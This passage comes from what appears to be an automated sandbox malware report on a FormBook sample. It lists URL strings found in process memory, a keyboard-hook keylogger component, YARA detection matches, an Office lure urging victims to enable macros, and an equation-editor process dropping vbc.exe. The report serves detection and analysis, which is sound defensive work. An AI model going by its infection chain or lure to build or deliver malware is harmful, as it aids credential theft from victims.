          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2144836367.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2160171245.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000002.2347213984.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2144836367.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2149115180.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2140719806.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2154967477.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2154697254.00000000082FD000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerp
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2140876935.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2160308177.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: vbc.exe, vbc.exe, 00000005.00000002.2171190369.0000000000F92000.00000020.00020000.sdmpString found in binary or memory: https://api.coinmarketcap.com/v1/ticker/
          Source: vbc.exe, vbc.exe, 00000005.00000002.2171190369.0000000000F92000.00000020.00020000.sdmpString found in binary or memory: https://coinmarketcap.com/api/

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Contains functionality to log keystrokes (.Net Source)Show sources
          Source: vbc[1].exe.2.dr, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
          Source: vbc.exe.2.dr, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
          Source: 4.0.vbc.exe.f90000.0.unpack, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
          Source: 4.2.vbc.exe.f90000.3.unpack, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
          Source: 5.0.vbc.exe.f90000.0.unpack, Utilities/GlobalKeyboardHook.cs.Net Code: Hook
          Source: 5.2.vbc.exe.f90000.3.unpack, Utilities/GlobalKeyboardHook.cs.Net Code: Hook

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: document is protected 17 18 19 20 21 22 Open the document m If this document was 23 Microsoft
          Source: Screenshot number: 4Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 31 0 0 0 0 0 q 32 " 33 0 0 0 0 0
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181B0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418260 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182E0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041816A NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181AB NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182DF NtClose,
